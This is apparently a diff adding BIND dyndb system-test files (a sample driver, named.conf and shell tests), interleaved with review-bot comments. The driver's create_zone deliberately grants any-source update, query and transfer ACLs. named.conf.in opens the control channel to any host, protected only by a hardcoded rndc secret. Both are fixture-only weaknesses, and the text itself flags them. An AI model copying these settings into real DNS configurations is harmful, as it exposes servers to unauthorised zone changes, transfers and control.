+ isc_buffer_init(&pevent->b, pevent->buf, sizeof(pevent->buf));
+ dns_fixedname_init(&pevent->ptr_target_name);
+
+ /* Check if reverse zone is managed by this driver */
+ result = syncptr_find_zone(inst, addr_rdata,
+ dns_fixedname_name(&ptr_name), &ptr_zone);
+ if (result != ISC_R_SUCCESS) {
+ log_error_r("PTR record synchronization skipped: reverse zone "
+ "is not managed by driver instance '%s'",
+ inst->db_name);
+ goto cleanup;
+ }
+
+ /* Reverse zone is managed by this driver, prepare PTR record */
+ pevent->zone = NULL;
+ dns_zone_attach(ptr_zone, &pevent->zone);
+ dns_name_copynf(name, dns_fixedname_name(&pevent->ptr_target_name));
+ dns_name_clone(dns_fixedname_name(&pevent->ptr_target_name),
+ &ptr_struct.ptr);
+ dns_diff_init(inst->mctx, &pevent->diff);
+ result = dns_rdata_fromstruct(&ptr_rdata, dns_rdataclass_in,
+ dns_rdatatype_ptr, &ptr_struct,
+ &pevent->b);
+ if (result != ISC_R_SUCCESS) {
+ log_write(ISC_LOG_ERROR,
+ "syncptr: dns_rdata_fromstruct -> %s\n",
+ isc_result_totext(result));
+ goto cleanup;
+ }
+
+ /* Create diff */
+ result = dns_difftuple_create(mctx, op, dns_fixedname_name(&ptr_name),
+ ttl, &ptr_rdata, &tp);
+ if (result != ISC_R_SUCCESS) {
+ log_write(ISC_LOG_ERROR,
+ "syncptr: dns_difftuple_create -> %s\n",
+ isc_result_totext(result));
+ goto cleanup;
+ }
+ dns_diff_append(&pevent->diff, &tp);
+
+ /*
+ * Send update event to the reverse zone.
+ * It will be processed asynchronously.
+ */
+ dns_zone_gettask(ptr_zone, &task);
+ isc_task_send(task, (isc_event_t **)&pevent);
+
+cleanup:
+ if (ptr_zone != NULL) {
+ dns_zone_detach(&ptr_zone);
+ }
+ if (tp != NULL) {
+ dns_difftuple_free(&tp);
+ }
+ if (task != NULL) {
+ isc_task_detach(&task);
+ }
+ if (pevent != NULL) {
+ isc_event_free((isc_event_t **)&pevent);
+ }
+
+ return (result);
+}
+
+/*
+ * Generate update event for every rdata in rdataset.
+ *
+ * @param[in] name Owner name for A/AAAA records in rdataset.
+ * @param[in] rdataset A/AAAA records.
+ * @param[in] op DNS_DIFFOP_ADD / DNS_DIFFOP_DEL for adding / deleting
+ * the rdata
+ */
+isc_result_t
+syncptrs(sample_instance_t *inst, dns_name_t *name, dns_rdataset_t *rdataset,
+ dns_diffop_t op) {
+ isc_result_t result;
+ dns_rdata_t rdata = DNS_RDATA_INIT;
+
+ for (result = dns_rdataset_first(rdataset); result == ISC_R_SUCCESS;
+ result = dns_rdataset_next(rdataset))
+ {
+ dns_rdataset_current(rdataset, &rdata);
+ result = syncptr(inst, name, &rdata, rdataset->ttl, op);
+ if (result != ISC_R_SUCCESS && result != ISC_R_NOTFOUND) {
+ goto cleanup;
+ }
+ }
+ if (result == ISC_R_NOMORE) {
+ result = ISC_R_SUCCESS;
+ }
+
+cleanup:
+ return (result);
+}
diff --git a/bin/tests/system/dyndb/driver/syncptr.h b/bin/tests/system/dyndb/driver/syncptr.h
new file mode 100644
index 0000000..91edee1
--- /dev/null
+++ b/bin/tests/system/dyndb/driver/syncptr.h
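Review bot: In `syncptr_write` (syncptr.c) the cleanup path calls `dns_db_closeversion(db, &version, true)` unconditionally, so a diff that `dns_diff_apply` rejected part-way is still committed to the reverse zone; passing the outcome instead, `dns_db_closeversion(db, &version, result == ISC_R_SUCCESS);`, would discard the new version on failure. In `syncptr`, the two error exits after `dns_zone_attach(ptr_zone, &pevent->zone)` and `dns_diff_init()` release the event with `isc_event_free()` only, which as far as this file shows leaves the attached zone reference and the initialised diff behind. Setting `pevent->zone = NULL` right after allocation and detaching the zone and clearing the diff in cleanup when it is non-NULL would close that path. `syncptr_find_zone` likewise runs `dns_rdata_freestruct()` on `ipv4` or `ipv6` in cleanup even when `CHECK(dns_rdata_tostruct(...))` failed and the struct was never filled in.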
@@ -0,0 +1,46 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0 AND ISC
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * Copyright (C) Red Hat
+ *
+ * Permission to use, copy, modify, and/or distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH
+ * REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
+ * AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT,
+ * INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
+ * LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE
+ * OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
+ * PERFORMANCE OF THIS SOFTWARE.
+ */
+
+/*
+ * Sync PTR records
+ */
+
+#pragma once
+
+#include <isc/result.h>
+
+#include <dns/diff.h>
+#include <dns/name.h>
+#include <dns/rdataset.h>
+
+#include "instance.h"
+
+isc_result_t
+syncptrs(sample_instance_t *inst, dns_name_t *name, dns_rdataset_t *rdataset,
+ dns_diffop_t op);
diff --git a/bin/tests/system/dyndb/driver/util.h b/bin/tests/system/dyndb/driver/util.h
new file mode 100644
index 0000000..1e43e05
--- /dev/null
+++ b/bin/tests/system/dyndb/driver/util.h
@@ -0,0 +1,85 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0 AND ISC
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * Copyright (C) Red Hat
+ *
+ * Permission to use, copy, modify, and/or distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH
+ * REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
+ * AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT,
+ * INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
+ * LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE
+ * OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
+ * PERFORMANCE OF THIS SOFTWARE.
+ */
+
+/*
+ * Memory allocation and error handling utilities.
+ */
+
+#ifndef _LD_UTIL_H_
+#define _LD_UTIL_H_
+
+#include <isc/mem.h>
+
+#include <dns/types.h>
+
+#include "log.h"
+
+#define CLEANUP_WITH(result_code) \
+ do { \
+ result = (result_code); \
+ goto cleanup; \
+ } while (0)
+
+#define CHECK(op) \
+ do { \
+ result = (op); \
+ if (result != ISC_R_SUCCESS) \
+ goto cleanup; \
+ } while (0)
+
+#define CHECKED_MEM_GET(m, target_ptr, s) \
+ do { \
+ (target_ptr) = isc_mem_get((m), (s)); \
+ if ((target_ptr) == NULL) { \
+ result = ISC_R_NOMEMORY; \
+ log_error("Memory allocation failed"); \
+ goto cleanup; \
+ } \
+ } while (0)
+
+#define CHECKED_MEM_GET_PTR(m, target_ptr) \
+ CHECKED_MEM_GET(m, target_ptr, sizeof(*(target_ptr)))
+
+#define CHECKED_MEM_STRDUP(m, source, target) \
+ do { \
+ (target) = isc_mem_strdup((m), (source)); \
+ if ((target) == NULL) { \
+ result = ISC_R_NOMEMORY; \
+ log_error("Memory allocation failed"); \
+ goto cleanup; \
+ } \
+ } while (0)
+
+#define ZERO_PTR(ptr) memset((ptr), 0, sizeof(*(ptr)))
+
+#define MEM_PUT_AND_DETACH(target_ptr) \
+ isc_mem_putanddetach(&(target_ptr)->mctx, target_ptr, \
+ sizeof(*(target_ptr)))
+
+#endif /* !_LD_UTIL_H_ */
diff --git a/bin/tests/system/dyndb/driver/zone.c b/bin/tests/system/dyndb/driver/zone.c
new file mode 100644
index 0000000..7f6e1db
--- /dev/null
+++ b/bin/tests/system/dyndb/driver/zone.c
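Review bot: `ZERO_PTR` in util.h expands to `memset()`, but the header includes only `<isc/mem.h>`, `<dns/types.h>` and `log.h`, so the macro compiles only where the including file happens to bring in `<string.h>` some other way; adding `#include <string.h>` here keeps the header self-contained. `CLEANUP_WITH`, `CHECK` and the `CHECKED_MEM_*` macros also assign to a local `result` and jump to a `cleanup:` label that the caller has to supply, which is nowhere stated. A comment at the top of the macro block would cover it, e.g. `/* These macros require 'isc_result_t result' and a 'cleanup:' label in the calling function. */`.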
@@ -0,0 +1,265 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0 AND ISC
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * Copyright (C) Red Hat
+ *
+ * Permission to use, copy, modify, and/or distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH
+ * REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
+ * AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT,
+ * INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
+ * LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE
+ * OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
+ * PERFORMANCE OF THIS SOFTWARE.
+ */
+
+/*
+ * Zone management.
+ */
+
+#include "zone.h"
+#include <inttypes.h>
+#include <stdbool.h>
+
+#include <isc/util.h>
+
+#include <dns/dyndb.h>
+#include <dns/view.h>
+#include <dns/zone.h>
+
+#include "instance.h"
+#include "lock.h"
+#include "log.h"
+#include "util.h"
+
+extern const char *impname;
+
+/*
+ * Create a new zone with origin 'name'. The zone stay invisible to clients
+ * until it is explicitly added to a view.
+ */
+isc_result_t
+create_zone(sample_instance_t *const inst, dns_name_t *const name,
+ dns_zone_t **const rawp) {
+ isc_result_t result;
+ dns_zone_t *raw = NULL;
+ const char *zone_argv[1];
+ char zone_name[DNS_NAME_FORMATSIZE];
+ dns_acl_t *acl_any = NULL;
+
+ REQUIRE(inst != NULL);
+ REQUIRE(name != NULL);
+ REQUIRE(rawp != NULL && *rawp == NULL);
+
+ zone_argv[0] = inst->db_name;
+
+ result = dns_zone_create(&raw, inst->mctx);
+ if (result != ISC_R_SUCCESS) {
+ log_write(ISC_LOG_ERROR, "create_zone: dns_zone_create -> %s\n",
+ isc_result_totext(result));
+ goto cleanup;
+ }
+ result = dns_zone_setorigin(raw, name);
+ if (result != ISC_R_SUCCESS) {
+ log_write(ISC_LOG_ERROR,
+ "create_zone: dns_zone_setorigin -> %s\n",
+ isc_result_totext(result));
+ goto cleanup;
+ }
+ dns_zone_setclass(raw, dns_rdataclass_in);
+ dns_zone_settype(raw, dns_zone_primary);
+ dns_zone_setdbtype(raw, 1, zone_argv);
+
+ result = dns_zonemgr_managezone(inst->zmgr, raw);
+ if (result != ISC_R_SUCCESS) {
+ log_write(ISC_LOG_ERROR,
+ "create_zone: dns_zonemgr_managezone -> %s\n",
+ isc_result_totext(result));
+ goto cleanup;
+ }
+
+ /* This is completely insecure - use some sensible values instead! */
+ result = dns_acl_any(inst->mctx, &acl_any);
+ if (result != ISC_R_SUCCESS) {
+ log_write(ISC_LOG_ERROR, "create_zone: dns_acl_any -> %s\n",
+ isc_result_totext(result));
+ goto cleanup;
+ }
+ dns_zone_setupdateacl(raw, acl_any);
+ dns_zone_setqueryacl(raw, acl_any);
+ dns_zone_setxfracl(raw, acl_any);
+ dns_acl_detach(&acl_any);
+
+ *rawp = raw;
+ return (ISC_R_SUCCESS);
+
+cleanup:
+ dns_name_format(name, zone_name, DNS_NAME_FORMATSIZE);
+ log_error_r("failed to create new zone '%s'", zone_name);
+
+ if (raw != NULL) {
+ if (dns_zone_getmgr(raw) != NULL) {
+ dns_zonemgr_releasezone(inst->zmgr, raw);
+ }
+ dns_zone_detach(&raw);
+ }
+ if (acl_any != NULL) {
+ dns_acl_detach(&acl_any);
+ }
+
+ return (result);
+}
+
+/*
+ * Add zone to the view defined in inst->view. This will make the zone visible
+ * to clients.
+ */
+static isc_result_t
+publish_zone(sample_instance_t *inst, dns_zone_t *zone) {
+ isc_result_t result;
+ bool freeze = false;
+ dns_zone_t *zone_in_view = NULL;
+ dns_view_t *view_in_zone = NULL;
+ isc_result_t lock_state = ISC_R_IGNORE;
+
+ REQUIRE(inst != NULL);
+ REQUIRE(zone != NULL);
+
+ /* Return success if the zone is already in the view as expected. */
+ result = dns_view_findzone(inst->view, dns_zone_getorigin(zone),
+ &zone_in_view);
+ if (result != ISC_R_SUCCESS && result != ISC_R_NOTFOUND) {
+ goto cleanup;
+ }
+
+ view_in_zone = dns_zone_getview(zone);
+ if (view_in_zone != NULL) {
+ /* Zone has a view set -> view should contain the same zone. */
+ if (zone_in_view == zone) {
+ /* Zone is already published in the right view. */
+ CLEANUP_WITH(ISC_R_SUCCESS);
+ } else if (view_in_zone != inst->view) {
+ /*
+ * Un-published inactive zone will have
+ * inst->view in zone but will not be present
+ * in the view itself.
+ */
+ dns_zone_log(zone, ISC_LOG_ERROR,
+ "zone->view doesn't "
+ "match data in the view");
+ CLEANUP_WITH(ISC_R_UNEXPECTED);
+ }
+ }
+
+ if (zone_in_view != NULL) {
+ dns_zone_log(zone, ISC_LOG_ERROR,
+ "cannot publish zone: view already "
+ "contains another zone with this name");
+ CLEANUP_WITH(ISC_R_UNEXPECTED);
+ }
+
+ run_exclusive_enter(inst, &lock_state);
+ if (inst->view->frozen) {
+ freeze = true;
+ dns_view_thaw(inst->view);
+ }
+
+ dns_zone_setview(zone, inst->view);
+ result = dns_view_addzone(inst->view, zone);
+ if (result != ISC_R_SUCCESS) {
+ log_write(ISC_LOG_ERROR,
+ "publish_zone: dns_view_addzone -> %s\n",
+ isc_result_totext(result));
+ goto cleanup;
+ }
+
+cleanup:
+ if (zone_in_view != NULL) {
+ dns_zone_detach(&zone_in_view);
+ }
+ if (freeze) {
+ dns_view_freeze(inst->view);
+ }
+ run_exclusive_exit(inst, lock_state);
+
+ return (result);
+}
+
+/*
+ * @warning Never call this on raw part of in-line secure zone, call it only
+ * on the secure zone!
+ */
+static isc_result_t
+load_zone(dns_zone_t *zone) {
+ isc_result_t result;
+ bool zone_dynamic;
+ uint32_t serial;
+
+ result = dns_zone_load(zone, false);
+ if (result != ISC_R_SUCCESS && result != DNS_R_UPTODATE &&
+ result != DNS_R_DYNAMIC && result != DNS_R_CONTINUE)
+ {
+ goto cleanup;
+ }
+ zone_dynamic = (result == DNS_R_DYNAMIC);
+
+ result = dns_zone_getserial(zone, &serial);
+ if (result != ISC_R_SUCCESS) {
+ log_write(ISC_LOG_ERROR,
+ "load_zone: dns_zone_getserial -> %s\n",
+ isc_result_totext(result));
+ goto cleanup;
+ }
+ dns_zone_log(zone, ISC_LOG_INFO, "loaded serial %u", serial);
+
+ if (zone_dynamic) {
+ dns_zone_notify(zone);
+ }
+
+cleanup:
+ return (result);
+}
+
+/*
+ * Add zone to view and call dns_zone_load().
+ */
+isc_result_t
+activate_zone(sample_instance_t *inst, dns_zone_t *raw) {
+ isc_result_t result;
+
+ /*
+ * Zone has to be published *before* zone load
+ * otherwise it will race with zone->view != NULL check
+ * in zone_maintenance() in zone.c.
+ */
+ result = publish_zone(inst, raw);
+ if (result != ISC_R_SUCCESS) {
+ dns_zone_log(raw, ISC_LOG_ERROR, "cannot add zone to view: %s",
+ dns_result_totext(result));
+ goto cleanup;
+ }
+
+ result = load_zone(raw);
+ if (result != ISC_R_SUCCESS) {
+ log_write(ISC_LOG_ERROR, "activate_zone: load_zone -> %s\n",
+ isc_result_totext(result));
+ goto cleanup;
+ }
+
+cleanup:
+ return (result);
+}
diff --git a/bin/tests/system/dyndb/driver/zone.h b/bin/tests/system/dyndb/driver/zone.h
new file mode 100644
index 0000000..85575a0
--- /dev/null
+++ b/bin/tests/system/dyndb/driver/zone.h
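Review bot: `create_zone` in zone.c attaches the `dns_acl_any()` ACL to update, query and transfer at once, so every zone this driver creates accepts dynamic updates and zone transfers from any address that can reach the listener, and the existing one-line warning does not say which calls are the dangerous ones or what a driver derived from this sample should do instead. Because the file serves as a template for dyndb drivers, the comment should spell that out, e.g. `/* Test fixture only: any-source update/query/xfr. A real driver must take these ACLs from its configuration and keep update and transfer closed by default. */`. `activate_zone` also formats an `isc_result_t` with `dns_result_totext()` in one branch and `isc_result_totext()` in the other; using one of them throughout would be more consistent.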
@@ -0,0 +1,45 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0 AND ISC
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * Copyright (C) Red Hat
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the
+ * above copyright notice and this permission notice appear in all
+ * copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND STICHTING NLNET
+ * DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
+ * STICHTING NLNET BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR
+ * CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS
+ * OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE
+ * OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE
+ * USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+#pragma once
+
+#include <isc/result.h>
+
+#include <dns/name.h>
+
+#include "instance.h"
+
+isc_result_t
+create_zone(sample_instance_t *const inst, dns_name_t *const name,
+ dns_zone_t **const rawp);
+
+isc_result_t
+activate_zone(sample_instance_t *inst, dns_zone_t *raw);
diff --git a/bin/tests/system/dyndb/ns1/named.conf.in b/bin/tests/system/dyndb/ns1/named.conf.in
new file mode 100644
index 0000000..279d0ed
--- /dev/null
+++ b/bin/tests/system/dyndb/ns1/named.conf.in
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+controls { };
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ session-keyfile "session.key";
+ listen-on { 10.53.0.1; 127.0.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+dyndb sample "../driver/lib/sample.so" { ipv4.example.nil. in-addr.arpa. };
+dyndb sample2 "../driver/lib/sample.so" { ipv6.example.nil. 8.b.d.0.1.0.0.2.ip6.arpa. };
diff --git a/bin/tests/system/dyndb/prereq.sh b/bin/tests/system/dyndb/prereq.sh
new file mode 100644
index 0000000..3140d14
--- /dev/null
+++ b/bin/tests/system/dyndb/prereq.sh
@@ -0,0 +1,27 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+$FEATURETEST --have-dlopen || {
+ echo_i "dlopen() not supported - skipping dyndb test"
+ exit 255
+}
+
+$FEATURETEST --tsan && {
+ echo_i "TSAN - skipping dyndb test"
+ exit 255
+}
+
+exit 0
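Review bot: The control channel in bin/tests/system/dyndb/ns1/named.conf.in is opened with `allow { any; }` and authenticated only by the literal `rndc_key` secret committed in the file, and nothing in the file marks either as test-only. A comment above the `key` block, such as `/* Test network only: fixed rndc key, never reuse outside the system tests. */`, would keep the stanza from being copied into a real configuration unchanged. The file also carries two `controls` statements, an empty one at the top and the `inet` one further down; the empty one appears redundant once the second is present.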
diff --git a/bin/tests/system/dyndb/setup.sh b/bin/tests/system/dyndb/setup.sh
new file mode 100644
index 0000000..e46affa
--- /dev/null
+++ b/bin/tests/system/dyndb/setup.sh
@@ -0,0 +1,17 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
diff --git a/bin/tests/system/dyndb/tests.sh b/bin/tests/system/dyndb/tests.sh
new file mode 100644
index 0000000..2bc54a7
--- /dev/null
+++ b/bin/tests/system/dyndb/tests.sh
@@ -0,0 +1,165 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+status=0
+n=0
+
+DIGOPTS="@10.53.0.1 -p ${PORT}"
+RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s"
+
+newtest() {
+ n=`expr $n + 1`
+ echo_i "${1} (${n})"
+ ret=0
+}
+
+test_add() {
+ host="$1"
+ type="$2"
+ ip="$3"
+
+ cat <<EOF > ns1/update.txt
+server 10.53.0.1 ${PORT}
+ttl 86400
+update add $host $type $ip
+send
+EOF
+
+ newtest "adding $host $type $ip"
+ $NSUPDATE ns1/update.txt > /dev/null 2>&1 || {
+ [ "$should_fail" ] || \
+ echo_i "update failed for $host $type $ip"
+ return 1
+ }
+
+ out=`$DIG $DIGOPTS +noall +answer -t $type -q $host`
+ echo $out > added.a.out.$n
+ lines=`echo "$out" | grep "$ip" | wc -l`
+ [ $lines -eq 1 ] || {
+ [ "$should_fail" ] || \
+ echo_i "dig output incorrect for $host $type $cmd: $out"
+ return 1
+ }
+
+ for i in 1 2 3 4 5 6 7 8 9 10
+ do
+ out=`$DIG $DIGOPTS +noall +answer -x $ip`
+ echo $out > added.ptr.out.$n
+ lines=`echo "$out" | grep "$host" | wc -l`
+ [ $lines -eq 1 ] && break;
+ $PERL -e 'select(undef, undef, undef, 0.1);'
+ done
+ [ $lines -eq 1 ] || {
+ [ "$should_fail" ] || \
+ echo_i "dig reverse output incorrect for $host $type $cmd: $out"
+ return 1
+ }
+
+ return 0
+}
+
+test_del() {
+ host="$1"
+ type="$2"
+
+ ip=`$DIG $DIGOPTS +short $host $type`
+
+ cat <<EOF > ns1/update.txt
+server 10.53.0.1 ${PORT}
+update del $host $type
+send
+EOF
+
+ newtest "deleting $host $type (was $ip)"
+ $NSUPDATE ns1/update.txt > /dev/null 2>&1 || {
+ [ "$should_fail" ] || \
+ echo_i "update failed deleting $host $type"
+ return 1
+ }
+
+ out=`$DIG $DIGOPTS +noall +answer -t $type -q $host`
+ echo $out > deleted.a.out.$n
+ lines=`echo "$out" | grep "$ip" | wc -l`
+ [ $lines -eq 0 ] || {
+ [ "$should_fail" ] || \
+ echo_i "dig output incorrect for $host $type $cmd: $out"
+ return 1
+ }
+
+ for i in 1 2 3 4 5 6 7 8 9 10
+ do
+ out=`$DIG $DIGOPTS +noall +answer -x $ip`
+ echo $out > deleted.ptr.out.$n
+ lines=`echo "$out" | grep "$host" | wc -l`
+ [ $lines -eq 0 ] && break
+ $PERL -e 'select(undef, undef, undef, 0.1);'
+ done
+ [ $lines -eq 0 ] || {
+ [ "$should_fail" ] || \
+ echo_i "dig reverse output incorrect for $host $type $cmd: $out"
+ return 1
+ }
+
+ return 0
+}
+
+test_add test1.ipv4.example.nil. A "10.53.0.10" || ret=1
+status=`expr $status + $ret`
+
+test_add test2.ipv4.example.nil. A "10.53.0.11" || ret=1
+status=`expr $status + $ret`
+
+test_add test3.ipv4.example.nil. A "10.53.0.12" || ret=1
+status=`expr $status + $ret`
+
+test_add test4.ipv6.example.nil. AAAA "2001:db8::1" || ret=1
+status=`expr $status + $ret`
+
+test_del test1.ipv4.example.nil. A || ret=1
+status=`expr $status + $ret`
+
+test_del test2.ipv4.example.nil. A || ret=1
+status=`expr $status + $ret`
+
+test_del test3.ipv4.example.nil. A || ret=1
+status=`expr $status + $ret`
+
+test_del test4.ipv6.example.nil. AAAA || ret=1
+status=`expr $status + $ret`
+
+newtest "checking parameter logging"
+grep "loading params for dyndb 'sample' from .*named.conf:" ns1/named.run > /dev/null || ret=1
+grep "loading params for dyndb 'sample2' from .*named.conf:" ns1/named.run > /dev/null || ret=1
+[ $ret -eq 1 ] && echo_i "failed"
+status=`expr $status + $ret`
+
+echo_i "checking dyndb still works after reload"
+rndc_reload ns1 10.53.0.1
+
+test_add test5.ipv4.example.nil. A "10.53.0.10" || ret=1
+status=`expr $status + $ret`
+
+test_add test6.ipv6.example.nil. AAAA "2001:db8::1" || ret=1
+status=`expr $status + $ret`
+
+test_del test5.ipv4.example.nil. A || ret=1
+status=`expr $status + $ret`
+
+test_del test6.ipv6.example.nil. AAAA || ret=1
+status=`expr $status + $ret`
+
+echo_i "exit status: $status"
+[ $status -eq 0 ] || exit 1
diff --git a/bin/tests/system/ecdsa/clean.sh b/bin/tests/system/ecdsa/clean.sh
new file mode 100644
index 0000000..a5fa815
--- /dev/null
+++ b/bin/tests/system/ecdsa/clean.sh
@@ -0,0 +1,24 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f */K* */dsset-* */*.signed
+rm -f dig.out*
+rm -f ns*/named.run
+rm -f ns*/named.memstats
+rm -f ns*/named.lock
+rm -f ns*/named.conf
+rm -f ns*/managed-keys.bind*
+rm -f ns*/root.db
+rm -f ns*/signer.err
+rm -f ns*/trusted.conf
+rm -f *-supported.file
diff --git a/bin/tests/system/ecdsa/ns1/named.conf.in b/bin/tests/system/ecdsa/ns1/named.conf.in
new file mode 100644
index 0000000..da27c58
--- /dev/null
+++ b/bin/tests/system/ecdsa/ns1/named.conf.in
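Review bot: In bin/tests/system/dyndb/tests.sh the failure messages in `test_add` and `test_del` interpolate `$cmd`, which is never assigned anywhere in the script, so the diagnostic prints an empty field where the address was presumably intended; `echo_i "dig output incorrect for $host $type $ip: $out"` (and likewise in the two reverse-lookup messages) would report what was actually checked. In `test_del`, `ip` comes from `dig +short` and is used without checking that it is non-empty: an empty value makes `grep "$ip"` match every line and leaves `-x $ip` without an address. A guard right after the lookup, `[ -n "$ip" ] || { echo_i "no $type record found for $host"; return 1; }`, would turn that into an explicit failure.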
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
